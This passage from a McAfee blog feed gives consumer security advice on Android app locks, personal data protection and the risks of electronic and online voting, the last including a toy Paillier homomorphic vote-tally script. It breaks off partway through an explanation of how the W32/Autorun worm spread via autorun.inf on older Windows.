    One way to avoid this from happening is by applying an app lock, a digital padlock that adds an authentication step such as a password, pattern, or biometric before an application can be launched.

    Device locks aren’t enough

    In your home, a locked front door keeps strangers out. But what happens if you unwittingly leave the front door unlocked and someone walks in? Without interior locks, your bedroom, office, and safe are now accessible to anyone.

    This same concept applies to your device with unprotected apps. Once unlocked, apps like Gmail, Facebook, or mobile banking don’t always require you to log in every time. It’s convenient, until it’s not.

    An app lock serves as an interior lock, protecting your sensitive data even after an unauthorized person has gotten past the device lock, and maintaining privacy boundaries.

    When you or another person attempts to open an app on your device, the system first triggers an authentication screen. After verifying your PIN, fingerprint, or face, the app will open, ensuring that your personal information stays off-limits to people who do not know your authentication step. In Android, app locks work seamlessly in the background without slowing performance.

    This layered defense mirrors the cybersecurity approach used on enterprise systems, but scaled down for consumers. Each layer handles different threats, so if one fails, the others still protect you:

    • Your phone’s screen lock guards the device.
    • Your antivirus protects against malware.
    • Your app lock safeguards the personal data inside.

    Everyday scenarios where app locks matter

    • Family and shared devices: If you are a parent, you might lend your phone to your child for a game. Within minutes, they’ve opened your email app or shopping account. With app lock, you can hand over your device without worrying they’ll see or purchase something they shouldn’t.
    • Friends and social moments: You’re showing photos to a friend, and they accidentally swipe into your text or social media messages. An app lock keeps your private conversations private, no explanations needed.
    • Traveling and public use: When your phone is out of your hands, whether it is passing through airport security, left on a café table, or snatched while unlocked, app locks ensure that an unlocked device doesn’t expose your sensitive apps.
    • Work and personal boundaries: Many professionals use personal phones for work. App locks separate business and personal data, securing email, document-sharing apps, and collaboration tools from family members or friends who borrow your device.

    The risks of unprotected apps

    Leaving apps unprotected can do more than just embarrass you. Here are some examples of how unprotected apps could lead to lasting harm:

    • Email access lets intruders reset passwords for your other accounts and eventually lock you out. This applies not only to your personal email, but also to your corporate email account if you have a work profile on your phone.
    • Social media enables hackers to impersonate you, violate your privacy or that of the people around you, or post malicious content that could damage your reputation and personal relationships.
    • Banking and finance apps provide direct access to your money and accounts. Aside from the financial loss, cybercriminals who gain access to your accounts could apply for loans in your name or commit financial fraud in your name.
    • Photo galleries reveal personal images, family details, or screenshots containing sensitive data.

    Even just one unauthorized session could cascade into identity theft or financial fraud. That’s why security experts recommend app-level protection as part of a layered, reinforced mobile defense strategy.

    Your guide to setting up your app locks on Android

    While many Android phones include some app-locking capabilities, dedicated mobile security apps provide more robust options and better protection. Here’s how to set up app locks effectively:

    1. Choose a strong authentication method

    Use a 6-digit or longer PIN, complex pattern, or biometric such as fingerprint or face unlock. Avoid using the same PIN as your main device.

    2. Select which apps to protect

    Choose the priority mobile apps that you want to protect. Start with your most sensitive apps, such as:

    • Banking and finance
    • Email and messaging
    • Cloud storage
    • Photo gallery
    • Shopping apps with saved payment info

    3. Adjust lock timers for convenience

    Set timeouts based on app sensitivity:

    • Banking and shopping: Lock these immediately after you finish using them. This gives prying eyes zero chances to intercept your information.
    • Messaging: You can be more lenient here. Allow for a 30- to 60-second delay in case you have additional thoughts to communicate.
    • Work apps: For continuity, you can permit short delays in locking work apps during business hours. But once you leave work, you can set up the app locks to immediately activate.

    4. Manage notifications and privacy

    Hide notification content for locked apps. This keeps private messages or bank alerts from showing up on your lock screen.

    The advantage of dedicated app locks

    Most Android manufacturers now offer convenient, built-in app locking features. Their capabilities vary by vendor, however, and some lack biometric unlock, the ability to hide locked apps, or fine-grained lock timers.

    Dedicated solutions go further, providing:

    • Seamless biometric access
    • Anti-tampering protection
    • Stealth mode to hide locked apps from view
    • Remote access controls if your phone is lost or stolen
    • Integrated alerts for suspicious log-in attempts

    With an app lock, your mischievous friends will never be able to post embarrassing status updates on your Facebook profile, and your jealous partner won’t be able to snoop through your photos or emails. For parents, you can keep your kids locked out of the apps that would allow them to access inappropriate content without having to watch their every move.

    Most importantly, app locks protect you from thieves and strangers in case of a stolen or lost device.

    Final thoughts

    Your phone carries more than just apps. It holds the details of your daily life. From private conversations and family photos to financial information and work data, much of what matters most to you lives behind those app icons. While a device lock is an important first step, it isn’t always enough on its own.

    App locks give you greater control over your privacy by protecting individual apps, even when your phone is already unlocked. They help prevent accidental access, discourage snooping, and reduce the risk of serious harm if your device is lost or stolen. Most importantly, they allow you to use and share your phone, without worrying about who might see what they shouldn’t.

    By adding app-level protection to your mobile security routine, you’re taking a simple but meaningful step toward safeguarding your personal information.

    The post App Locks Can Improve the Security of Your Mobile Phones appeared first on McAfee Blog.

    What Does It Take To Be Digitally Secure?

    By: McAfee

    It’s no longer possible to deny that your life in the physical world and your digital life are one and the same. Coming to terms with this reality will help you make better decisions in many aspects of your life.

    The same identity you use at work, at home, and with friends also exists in apps, inboxes, accounts, devices, and databases, whether you actively post online or prefer to stay quiet. Every purchase, login, location ping, and message leaves a trail. And that trail shapes what people, companies, and scammers can learn about you, how they can reach you, and what they might try to take.

    That’s why digital security isn’t just an IT or a “tech person” problem. It’s a daily life skill. When you understand how your digital life works, what information you’re sharing, where it’s stored, and how it can be misused, you make better decisions. This guide is designed to help you build that awareness and translate it into practical habits: protecting your data, securing your accounts, and staying in control of your privacy in a world that’s always connected.

    The essence of digital security

    Being digitally secure doesn’t mean hiding from the internet or using complicated tools you don’t understand. It means having intentional control over your digital life to reduce risks while still being able to live, work, and communicate online safely. A digitally secure person focuses on four interconnected areas:

    Personal information

    Your personal data is the foundation of your digital identity. Protecting it includes limiting how much data you share, understanding where it’s stored, and reducing how easily it can be collected, sold, or stolen. At its heart, personal information falls into two critical categories that require different levels of protection:

    • Personally identifiable information (PII): The data that directly identifies you, such as your name, home address, Social Security number, driver’s license number, and passport information. Financial data such as bank account numbers, credit card details, and tax identification numbers also fall into this category. Medical information, including health insurance numbers and medical records, is among your most sensitive PII and requires the highest level of protection.
    • Sensitive personal data: Information that may not identify you on its own but can be combined to build a comprehensive profile of your life and activities. This includes your phone number, email address, employment details, educational background, and family information. Your browsing history, location history, and social media posts also belong here, since they reveal patterns about your behavior, preferences, and daily routines.

    Digital accounts

    Account security ensures that only you can access them. Strong, unique passwords, multi-factor authentication, and secure recovery options prevent criminals from hijacking your email, banking, cloud storage, social media, and other online accounts, often the gateway to everything else in your digital life.

    Privacy

    Privacy control means setting boundaries and deciding who can see what about you, and under what circumstances. This includes managing social media visibility, app permissions, browser tracking, and third-party access to your data.

    Digital security is an ongoing effort as threats evolve, platforms change their policies, and new technologies introduce new risks. Staying digitally secure requires periodic check-ins, learning to recognize scams and manipulation, and adjusting your habits as the digital landscape changes.

    Common exposure points in daily digital life

    Your personal information faces exposure risks through multiple channels during routine digital activities, often without your explicit knowledge.

    • Public Wi-Fi networks: When you connect to unsecured networks in coffee shops, airports, hotels, or retail locations, your internet traffic can be intercepted by cybercriminals using the same network. This puts your login credentials, banking information, and communications at risk, even on networks that appear secure.
    • Data brokers: These companies gather data, often without your explicit knowledge, from public records, social media platforms, online purchases, and other digital activities to create your profile. They then sell this information to marketers, employers, and other interested parties.
    • Social media: When you overshare details about your location, vacation plans, family members, workplace, or daily routines, you provide cybercriminals with valuable information for identity theft and social engineering attacks. Regular platform policy changes can reset your previously private information or expose you to data breaches.
    • Third-party applications: Mobile apps, browser extensions, and online services frequently collect more data than necessary for their stated functionality, creating additional privacy risks for you. You could be granting these apps permission to access your personal data, contacts, location, camera, and other device functions without fully understanding how your data will be used, stored, or shared.
    • Web trackers: These small pieces of code embedded in websites follow your browsing behavior, monitoring which sites you visit, how long you stay, what you click on, and even where you move your mouse cursor. Advertising networks use this information to build a profile of your interests and online habits to serve you targeted ads.

    Core pillars of digital security

    Implementing comprehensive personal data protection requires a systematic approach that addresses the common exposure points. These practical steps provide layers of security that work together to minimize your exposure to identity theft and fraud.

    Minimize data sharing across platforms

    Start by conducting a thorough audit of your online accounts and subscriptions to identify where you have unnecessarily shared more data than needed. Remove or minimize details that aren’t essential for the service to function. Moving forward, provide only the minimum required information to new accounts and avoid linking them across different platforms unless necessary.

    Be particularly cautious with loyalty programs, surveys, and promotional offers that ask for extensive personal information, as they may share it with third parties. Read privacy policies carefully, focusing on sections that describe data sharing, retention periods, and your rights regarding your personal information.

    If possible, consider using separate email addresses for different accounts to limit cross-platform tracking and reduce the impact if one account is compromised. Create dedicated email addresses for shopping, social media, newsletters, and important accounts like banking and healthcare.

    Adjust account privacy settings

    Privacy protection requires regular attention to your account settings across all platforms and services you use. Social media platforms frequently update their privacy policies and settings, often defaulting to less private configurations that allow them to collect and share your data. For this reason, it is a good idea to review your privacy settings at least quarterly. Limit who can see your posts, contact information, and friend lists. Disable location tracking, facial recognition, and advertising customization features that rely on your personal data. Turn off automatic photo tagging and prevent search engines from indexing your profile.

    On Google accounts, visit your Activity Controls and disable Web & App Activity, Location History, and YouTube History to stop this data from being saved. You can even opt out of ad personalization entirely if desired by adjusting Google Ad Settings. If you are more tech savvy, Google Takeout allows you to export and review what data Google has collected about you.

    For Apple ID accounts, you can navigate to System Preferences on Mac or Settings on iOS devices to disable location-based Apple ads, limit app tracking, and review which apps have access to your contacts, photos, and other personal data.

    Meanwhile, Amazon accounts store extensive purchase history, voice recordings from Alexa devices, and browsing behavior. Review your privacy settings to limit data sharing with third parties, delete voice recordings, and manage your advertising preferences.

    Limit app permissions

    Regularly audit the permissions you’ve granted to installed applications. Many apps request far more permissions to your location, contacts, camera, and microphone even though they don’t need them. Cancel these unnecessary permissions, and be particularly cautious about granting access to sensitive data.

    Use strong passwords and multi-factor authentication

    Create passwords that actually protect you: long (at least 12 to 16 characters) and unique to each account, so that a breach at one service doesn’t expose the others. Length matters more than character-set tricks, so a passphrase of several unrelated words beats a short string of symbols, though mixing uppercase letters, lowercase letters, numbers, and special characters still raises the cost of a guessing attack. A password manager will generate and store these for you, and is the only practical way to keep a different password for every site.

    Aside from passwords, enable multi-factor authentication (MFA) on your most critical accounts: banking and financial services, email, cloud storage, social media, work, and healthcare. Use authenticator apps such as Google Authenticator, Microsoft Authenticator, or Authy rather than SMS-based authentication when possible, as text messages can be intercepted through SIM swapping attacks. When setting up MFA, ensure you save backup codes in a secure location and register multiple devices when possible to keep you from being locked out of your accounts if your primary authentication device is lost, stolen, or damaged.

    Alternatively, many services now offer passkeys which use cryptographic keys stored on your device, providing stronger security than passwords while being more convenient to use. Consider adopting passkeys for accounts that support them, particularly for your most sensitive accounts.

    Enable device encryption and automatic backups

    Device encryption protects your personal information if your smartphone, tablet, or laptop is lost, stolen, or accessed without authorization. Modern devices typically offer built-in encryption options that are easy to enable and don’t noticeably impact performance.

    You can implement automatic backup systems such as secure cloud storage services, and ensure backup data is protected. iOS users can utilize encrypted iCloud backups, while Android users should enable Google backup with encryption. Regularly test your backup systems to ensure they’re working correctly and that you can successfully restore your data when needed.

    Request data deletion and opt out from data brokers

    Identify major data brokers that likely have your information and look for their privacy policy or opt-out procedures, which often involves submitting a request with your personal information and waiting for confirmation that your data has been removed.

    In addition, review your subscriptions and memberships to identify services you no longer use. Request account deletion rather than simply closing accounts, as many companies retain data from closed accounts. When requesting deletion, ask specifically for all personal data to be removed from their systems, including backups and archives.

    Keep records of your opt-out and deletion requests, and follow up if you don’t receive confirmation within the stated timeframe. In the United States, key data broker companies include Acxiom, LexisNexis, Experian, Equifax, TransUnion, Whitepages, Spokeo, BeenVerified, and PeopleFinder. Visit each company’s website for its opt-out procedure.

    Use only trusted, secure networks

    Connect only to trusted, secure networks to reduce the risk of your data being intercepted by attackers lurking behind unsecured or fake Wi-Fi connections. Avoid logging into sensitive accounts on public networks in coffee shops, airports, or hotels, and use encrypted connections: HTTPS protects the contents of your traffic to a website, and a virtual private network additionally shields all of your traffic from the operator of the local network and hides your IP address from the sites you visit.

    Rather than using a free VPN service that often collects and sells your data to generate revenue, it is better to choose a premium, reputable VPN service that doesn’t log your browsing activities and offers servers in multiple locations.

    Ongoing monitoring and maintenance habits

    Cyber threats evolve constantly, privacy policies change, and new services collect different types of personal information, making personal data protection an ongoing process rather than a one-time task. Here are measures to help regularly maintain your personal data protection:

    • Quarterly reviews: Set up a quarterly review process to examine your privacy settings across all platforms and services. Create a calendar reminder to check your social media privacy settings, review app permissions on your devices, and audit your online accounts for unused services that should be deleted.
    • Credit monitoring: Monitor your financial accounts regularly for unauthorized activity and consider using credit monitoring services to alert you to potential identity theft.
    • Breach alerts: Stay informed about data breaches in the services you use by signing up for breach notification services. If a breach occurs, this will allow you to take immediate action to change passwords, monitor affected accounts, and consider additional security measures for compromised services.
    • Device updates: Enable automatic security and software updates on your devices, as these updates include important privacy and security improvements that protect you from newly discovered vulnerabilities.
    • Education and awareness: Stay informed about new privacy risks, learn about emerging protective technologies, and share knowledge with family members and friends who may benefit from improved personal data protection practices.

    By implementing these systematic approaches and maintaining regular attention to your privacy settings and data sharing practices, you significantly reduce your risk of identity theft and fraud while maintaining greater control over your digital presence and personal information.

    Final thoughts

    You don’t need to dramatically overhaul your entire digital security in one day, but you can start making meaningful improvements right now. Taking action today, even small steps, builds the foundation for stronger personal data protection and peace of mind in your digital life. Choose one critical account, update its password, enable multi-factor authentication, and you’ll already be significantly more secure than you were this morning. Your future self will thank you for taking these proactive steps to protect what matters most to you.

    Every step you take toward better privacy protection strengthens your overall digital security and reduces your risk of becoming a victim of scams, identity theft, or unwanted surveillance. You’ve already taken the first step by learning about digital security risks and solutions. Now it’s time to put that knowledge into action with practical steps that fit seamlessly into your digital routine.

    The post What Does It Take To Be Digitally Secure? appeared first on McAfee Blog.

    Hack the Vote: Pros and Cons of Electronic Voting

    By: McAfee

    Every four years, scores of American people flood churches, schools, homes, and auditoriums to cast their ballots for the future of American leadership. But amid the highs and lows of election night, there is an ongoing conversation about how the votes are being counted.

    As results slowly roll in, voters struggle with long lines and faulty machinery in key battleground states, prompting debates on the efficiency of the U.S. voting process. In an age where American Idol results can be instantaneously transmitted over a mobile device, why are we still feeding paper ballots into machines that look like props from ‘90s movies?

    On the one hand, countries like Canada, Norway and Australia have already experienced success with their adoption of online voting systems, and proponents say going digital will boost voter turnout and Election Day efficiency. On the other, naysayers cite hacking, malware, and other security threats as deal-breakers that could threaten the backbone of American democracy.

    So what are the facts behind this debate? Below, we’ve outlined key arguments for and against online, email, and electronic voting systems, to help users at home move beyond the pre-election campaign hype.

    Electronic voting: Better or worse than paper ballots?

    Since there have been elections, there have been people tampering with votes. Given this, experts are justifiably concerned with any technology that could introduce new points of access to the data stored during an election. Nevertheless, a handful of states now use electronic voting machines exclusively—Delaware, Georgia, Louisiana, New Jersey and South Carolina—and even notorious battleground states Ohio and Florida have made the move toward paperless votes.

    The concern is that when there is no physical ballot, it becomes next to impossible to determine if there has been tampering—especially in the case of a close election. The contested 2000 Bush-Gore race comes to mind as an example of the stark importance of reliable election machinery. In 2012, Pennsylvania voting machines were taken out of service after being captured on video changing votes from one candidate to another.

    Still, most of these machines now supply a paper trail to guard against tampering, and a vast majority undergo frequent, mandatory testing. The machines are also not connected to the Internet and are segregated from any network-connected devices. In terms of physical security, the machines themselves are secured with locks and tamper-evident seals, and they’re heavily protected when transported to and from polling places.

    Hacking the vote: It’s easier than you think

    While electronic voting promises efficiency and convenience, the reality is that these systems face significant vulnerabilities that make them easy targets for hacking.

    Attackers don’t need to hack every voting machine individually; they only need a foothold somewhere in the broader voting ecosystem, and there are several candidates. Supply chain risk is among the most concerning: malicious components or software can be introduced during manufacturing or in updates. Misconfigured systems and outdated firmware create entry points that attackers actively look for, and a network port left exposed on a device that was supposed to be isolated gives them a path into the infrastructure.

    Beyond direct machine tampering, more sophisticated attacks target ballot definition files, the digital templates that tell a machine how to map what a voter selects on screen to the candidate and race it records. Manipulating these files can alter election outcomes without voters noticing anything wrong. Similarly, the result reporting systems that carry vote tallies from polling locations to central counting facilities are attractive targets for anyone seeking to disrupt the count.

    Security research shows these vulnerabilities aren’t theoretical. In 2003, researchers at Johns Hopkins University (working with colleagues at Rice) documented serious flaws in the source code of a widely used touchscreen voting system, including weaknesses that would let an attacker cast multiple votes or alter tallies without detection. More recently, a 2022 security review of Georgia’s electronic polling equipment identified weaknesses that could have allowed unauthorized access to voter data and ballot information.

    Perhaps more concerning is how disinformation campaigns around unofficial election results can amplify doubts about electoral integrity, regardless of actual system security. These campaigns often spread false information about electronic voting fraud or online voting hack attempts, creating confusion that undermines public trust in legitimate election outcomes.

    It’s crucial to understand that the primary impact of these vulnerabilities often isn’t direct vote manipulation—it’s the erosion of voter confidence in our democratic processes. When people doubt that their votes count accurately, it weakens the foundation of democratic participation.

    Privacy & security concerns in online voting

    Will our presidential elections ever go the way of American Idol? Despite advances in technology, the vast majority of Americans must vote in person or via mail-in ballot. At present, only very limited electronic voting options exist, primarily for specific voter groups and circumstances, such as:

    • Military and overseas voters: Under the Uniformed and Overseas Citizens Absentee Voting Act (UOCAVA), some states allow military personnel and overseas citizens to return marked ballots electronically. This typically means downloading a ballot, marking it, and returning it by email, fax, or an upload portal, not full online voting, and ordinary email offers none of the protections the word “secure” would imply.
    • Voters with disabilities: These accommodations vary by state. Some states offer electronic ballot marking tools or accessible voting systems for voters with disabilities. These systems often allow electronic marking but require printing ballots for submission, maintaining a paper trail for verification.
    • Citizens displaced by natural disasters: In 2012, after Hurricane Sandy displaced many New Jersey residents, officials allowed email as an alternative way to return ballots. As Election Day loomed, the improvised system was soon blamed for a slew of problems.

    Vulnerabilities in online voting systems

    Understanding the vulnerabilities that plague electronic voting systems isn’t about creating fear, but about building stronger defenses. Below, we have listed some of the potential attack vectors to help you make informed decisions about digital democracy.

    The email software

    In email voting, unencrypted email poses a serious risk because messages can be read, spoofed, or altered in transit. A ballot sent without encryption crosses networks and mail servers as plain text, so anyone with access along the route can read or modify it before it reaches election officials. Plain email also offers no reliable proof of who sent a message, so an attacker can submit forged ballots in other voters’ names or send malware-laden attachments that look like ballots.

    The device

    The computers used to send or receive the emails can be compromised to change or block a voter’s choices. When you cast your ballot from an infected device, malware can alter or suppress your vote before it even leaves the machine. On the receiving end, election staff have to open attachments sent by unknown parties in order to tally the votes, which is one of the most common ways malware infections begin.

    Credential theft

    Phishing attacks target voting credentials through fake election websites and deceptive emails. Multi-factor authentication and government-issued digital credentials are essential barriers. NIST’s Digital Identity Guidelines (SP 800-63) define authentication assurance levels for high-stakes transactions; at the highest level they require a hardware-based, phishing-resistant authenticator rather than a password alone.

    Man-in-the-middle attacks

    Your vote travels across networks where an attacker positioned in the path might read or modify it. End-to-end encryption combined with digital signatures keeps the ballot confidential in transit and makes any alteration detectable: tamper-evident rather than tamper-proof, since a signature cannot prevent a change but guarantees it will be noticed. More advanced protocols such as homomorphic encryption go further and allow votes to be counted while they remain encrypted, so that no individual choice is exposed even to the tallying server.
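    To make the “counting without exposing individual choices” idea concrete, here is a toy additively homomorphic tally built on the Paillier cryptosystem. This is an added example written for this page, not code from McAfee or from any voting product. The primes, the vote values and the yes/no ballot format are constructed for the demonstration; a real deployment would use primes of 1024 bits or more, split the decryption key among several trustees, and attach a zero-knowledge proof to each ballot showing that it encrypts a 0 or a 1.

```python
import math
import secrets

# Constructed toy parameters: two small primes so the arithmetic is easy to follow.
# Assumption for this example only: keys this small offer no real security.
TOY_P, TOY_Q = 104723, 104729


def keygen(p=TOY_P, q=TOY_Q):
    """Paillier key generation with the common simplification g = n + 1."""
    n = p * q
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)  # lcm(p-1, q-1)
    g = n + 1
    # With g = n + 1, L(g^lam mod n^2) == lam mod n, so mu is simply lam^-1 mod n.
    mu = pow(lam, -1, n)
    return (n, g), (lam, mu)


def encrypt(pub, m):
    """Encrypt integer m (0 <= m < n); a fresh random r makes equal votes look different."""
    n, g = pub
    n2 = n * n
    while True:
        r = secrets.randbelow(n - 1) + 1
        if math.gcd(r, n) == 1:
            break
    return (pow(g, m, n2) * pow(r, n, n2)) % n2


def decrypt(pub, priv, c):
    """Recover m from c: c^lam == (1 + n)^(m*lam) * r^(n*lam) == 1 + m*lam*n (mod n^2)."""
    n, _ = pub
    lam, mu = priv
    n2 = n * n
    u = pow(c, lam, n2)
    return ((u - 1) // n * mu) % n  # L(u) * mu == m  (mod n)


def add_encrypted(pub, ciphertexts):
    """Multiplying Paillier ciphertexts adds their plaintexts: the tally is computed blind."""
    n, _ = pub
    n2 = n * n
    acc = 1
    for c in ciphertexts:
        acc = (acc * c) % n2
    return acc


def cast_ballot(pub, choice):
    """Encode one yes/no ballot as an encryption of 1 or 0.

    Limit of the bare scheme: the tallier cannot tell an encryption of 1 from an
    encryption of 1000, which is why real systems attach a zero-knowledge proof
    that each ballot encrypts a value in {0, 1}. This check only runs client-side.
    """
    if choice not in (0, 1):
        raise ValueError("ballot must be 0 or 1")
    return encrypt(pub, choice)


def tally(pub, priv, encrypted_ballots):
    """Decrypt only the aggregate; individual ballots are never decrypted."""
    return decrypt(pub, priv, add_encrypted(pub, encrypted_ballots))


if __name__ == "__main__":
    pub, priv = keygen()
    ballots = [cast_ballot(pub, v) for v in (1, 0, 1, 1, 0)]  # constructed sample votes
    print("yes votes:", tally(pub, priv, ballots))
```

    Run as a script it prints the yes count (3) for the five constructed ballots. The two caveats in the comments matter in practice: with these toy primes there is no real secrecy, and nothing on the server side stops a voter from encrypting a 5 instead of a 1, which is why ballots in real systems carry a zero-knowledge range proof and why the decryption key is shared among trustees so that no single party can decrypt an individual ballot.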

    Server-side vulnerabilities

    Voting servers face constant attack attempts. Independent security audits, isolated network environments, and a publicly verifiable record of submitted ballots (sometimes proposed as a blockchain, although a signed, append-only bulletin board gives the same auditability with far less complexity) can help maintain integrity. Regular penetration testing, in line with the Election Assistance Commission’s Voluntary Voting System Guidelines 2.0, identifies weaknesses before they are exploited.

    Distributed denial of service

    DDoS attacks can overwhelm voting portals during critical periods. Distributed server architecture, traffic filtering, and backup submission methods help keep the service reachable, while cloud-based scrubbing services provide scalable protection against volume-based attacks.

    Ballot secrecy

    Online systems must balance verification with privacy. Zero-knowledge proofs let a voter prove that a ballot is well-formed (that it encrypts a valid choice) and let the system prove that it was included in the count, in both cases without revealing the choice itself. Anonymous credential systems separate the proof that someone is eligible to vote from the content of their vote.

    Auditability challenges

    Any voting system needs an evidence trail that can be checked independently of the software: voter-verified paper audit trails (VVPAT) for in-person machines, and cryptographic receipts for online systems. Combined with risk-limiting audits, which hand-check a statistically chosen sample of the paper record against the reported result, these provide the transparency public confidence requires.

    Cyber threats to voting abound long before Election Day

    In this digital age, threats to the voting process start well before election day. Cybercriminals take advantage of the campaign fever when citizens turn to technology for updates on the election process or news about running candidates.

    Amid all this, your role as a voter includes recognizing these lures, verifying information against legitimate sources, and choosing secure voting methods where they are available. Democracy thrives when citizens understand both the possibilities and the precautions of digital participation. The most common pre-election scams:

    • Fake voter registration websites: Scammers create convincing look-alike sites that mimic official election portals to steal your personal information. These sites often appear in search results with urgent messaging about registration deadlines, but they’re designed to harvest your data for identity theft or voter suppression purposes.
    • Phishing texts and emails about “polling changes”: You might receive official-looking messages claiming your polling location has changed, voting has been extended, or you need to “confirm” your registration via text or email. These communications often create false urgency to trick you into clicking malicious links or sharing sensitive information.
    • Impersonation of election officials: Scammers pose as election workers, poll supervisors, or government officials via phone calls, texts, or door-to-door visits. They may claim there are problems with your registration, then request personal information to “verify” your eligibility.
    • Fake “voter help” hotlines: Fraudulent phone lines spread false information about voting procedures, dates, or requirements. These services intentionally provide incorrect details to discourage voting or cause confusion about the electoral process.
    • Political donation fraud: Fake political organizations and candidates set up fraudulent donation sites that look legitimate but funnel your money and financial information directly to scammers. These sites often use names similar to real campaigns or causes to deceive donors.

    Your role in protecting election integrity

    Every voter plays a role in ensuring elections remain fair, secure, and transparent. By following proper voting procedures, verifying information through official sources, and reporting suspicious activity, you help strengthen trust in the system. Small actions can make a big difference in protecting the integrity of every vote.

    • Plan your preferred voting method: Before Election Day arrives, take time to plan how you’ll cast your ballot, whether in person at your local polling place, by mail, or through the accessible voting options available in your state. If you are a military or overseas voter, research your state’s UOCAVA procedures. Planning ahead helps you avoid last-minute problems that might push you toward an unsafe workaround.
    • Confirm your voter registration status at your official state portal: This quick step ensures that your information—such as your name, address, and polling location—is accurate and up to date, and helps you avoid surprises like being listed under the wrong district or finding out you’re not registered at all.
    • Verify your polling location through official channels: This ensures you’re voting at legitimate facilities with properly managed systems. When available, choose paper backup options or locations that use voter-verified paper audit trails, which provide physical evidence of your vote that can’t be altered digitally.
    • Keep your personal devices secure during election periods: You can do this by updating software, using strong passwords, and being cautious about election-related apps, websites, or messages that aren’t from official government sources.
    • Stay alert for potential vulnerabilities: As a voter or observer, you can: verify polling place seals are intact, confirm machines display zero totals before voting begins, observe that poll workers follow proper procedures, and report any irregularities to election officials immediately.

    Key tips to verify legitimate communication during election season

    Practicing good cybersecurity hygiene helps safeguard not only your information but also the integrity of democratic participation. Here are some key guidelines to stay secure online and protect your vote.

    • Official election information comes from verified .gov websites: Scammers often create legitimate-looking websites to trick voters into sharing personal data or clicking malicious links. When searching for election details, rely on official .gov domains, which are restricted to U.S. government bodies and are maintained by state and local election authorities. A few local offices still use other addresses (often .us); if yours does, confirm the address through your state’s .gov election site rather than a search result.
    • Contact your state or local election office directly using official phone numbers: For voting-related questions, contact your state or local election office directly using details listed on verified .gov websites to ensure you receive accurate local information. Do not rely on social media, emails, or unofficial websites, as scammers often use these fake hotlines to collect personal data or sow disinformation.
    • Deal only with verified election officials: Imposters may pose as officials through phone calls, emails, or even in person to collect your personal data or influence your vote. To confirm legitimacy, check any communication from an official .gov email address or website, verified government phone line, or your local election office.
    • Verify “urgent” voting information through multiple official sources: During election season, scammers often spread “urgent” messages or “breaking news” to sow panic or confusion—such as changes in polling hours or locations—to suppress voter turnout. Always verify updates through official sources, such as your state’s .gov election website, local election office, or trusted news outlets.
    • Update all your devices with the latest security patches: Before researching candidates, browsing election information, or logging into voter portals, make sure all your devices are running the latest versions. Security patches fix vulnerabilities that hackers can exploit to install malware or steal personal data.
    • Use strong, unique passwords for voter-related accounts or portals. When creating strong, unique passwords for each election-related site you use, especially government or voter registration portals, use a mix of letters, numbers, and symbols, and avoid personal details like birthdays or pet names. Password managers can help you generate and store complex passwords, reducing the risk of credential theft.
    • Enable two-factor authentication (2FA) wherever possible. Enabling 2FA on your email and voter-related accounts significantly strengthens your defense against unauthorized access: even if hackers obtain your password, they cannot log in without the additional confirmation. Prefer an authenticator app or a hardware security key over codes sent by text message where the service offers one, since SMS codes can be intercepted or phished.
    • Report suspected election-related scams to your local officials and relevant authorities: If you encounter a suspicious website, message, or phone call related to voting—report it to your state or local election office, the Cybersecurity and Infrastructure Security Agency or the Federal Trade Commission. Authorities track malicious activity and protect other voters from falling victim to similar schemes.

    These multi-layered protections work together to maintain election integrity, though gaps can emerge when procedures aren’t consistently followed or when oversight is insufficient.

    Final thoughts

    While online voting systems can’t be written off, ongoing cybersecurity challenges don’t bode well for the immediate future of these platforms.

    While technology has transformed nearly every aspect of modern life—from shopping to banking, and working—applying that convenience to the voting booth still presents challenges. Security, transparency, and public trust remain at the core of any democratic process, and rushing toward online or paperless voting without upholding these principles could be harmful.

    Progress is steadily being made, however, with advances in encryption and digital identity frameworks. With careful design, rigorous testing, and strong oversight, technology can enhance the safeguards that underpin election integrity.

    For now, the most effective way to protect democracy is through awareness and participation. Stay informed about your state’s voting systems, verify election information only through official sources, and remain alert to misinformation and scams. Each responsible voter plays a part in strengthening the integrity of elections.

    The post Hack the Vote: Pros and Cons of Electronic Voting appeared first on McAfee Blog.

    Crush that Worm before It Creeps into Your Computer

    By: McAfee

    Some years ago, a highly infectious family of computer worms known generically as W32/Autorun was found infecting Windows computers. What makes a worm different from a virus is that it spreads by itself rather than by attaching to another program. W32/Autorun typically doesn’t steal anything itself; its job is to spread rapidly and open as many doors as possible so that attackers can install other malware that does the stealing of information, money, or both.

    While this worm is less widespread today, it continues to infect older Windows operating systems that are not regularly updated. This guide will take a closer look at how the worm spreads and outline preventive measures to avoid infection.

    Older Windows versions at risk

    Autorun worms primarily affect older Windows systems, chiefly Windows XP and Vista, which honored a drive’s autorun.inf file by default even for USB sticks. Microsoft recognized the problem: Windows 7 shipped with AutoRun restricted to CDs and DVDs, and in 2011 the same restriction was pushed to XP and Vista through Windows Update. Machines that never received that update, or that have had AutoRun re-enabled, remain at risk.

    When an autorun worm infects your system, it can compromise both your files and privacy in several ways by stealing personal documents, capturing passwords and banking information, or installing additional malware that monitors your online activities. Some variants encrypt your files for ransom, while others turn your computer into part of a botnet used for spam or cyberattacks. The infection can also spread to family members, friends, or colleagues when you share USB drives or connect to shared networks.

    While this worm is less common today thanks to the AutoRun changes in newer Windows versions, the idea behind it lives on in malware that spreads through malicious downloads, USB drives, or network shares, relying on disguised files and social engineering rather than an automatic launch. Detection still rests on up-to-date antivirus and user caution.

    Key ways W32/Autorun bypasses your computer’s defenses

    W32/Autorun is effective because it exploits everyday behaviors and outdated system features. Instead of forcing its way into your computer, it relies on built-in Windows functionality and simple tricks to get users to let it in, slip past basic defenses, and infect systems.

    Easy way in via Windows AutoRun

    An autorun worm spreads, as its name suggests, automatically through removable storage such as USB drives and external hard drives, and across network shares. The mechanism is a small text file, autorun.inf, in the root of the drive. Older versions of Windows read that file when the drive was connected and honored its directives: an open= line names a program to launch, and shell entries rewrite what double-clicking the drive or choosing “Open” from its context menu does. Depending on the Windows version and settings, the worm’s program ran as soon as the drive was inserted, appeared in the AutoPlay dialog dressed up as a legitimate choice such as “Open folder to view files” (complete with the folder icon), or ran when the user double-clicked the drive in My Computer. Once active, the worm copies itself, together with a fresh autorun.inf, to every other connected drive and reachable network share. Windows 7 shipped with AutoRun limited to optical media, and Microsoft pushed the same restriction to XP and Vista through Windows Update in 2011, but machines that never received that update still honor autorun.inf on USB media.

    Fake folders lure victims in

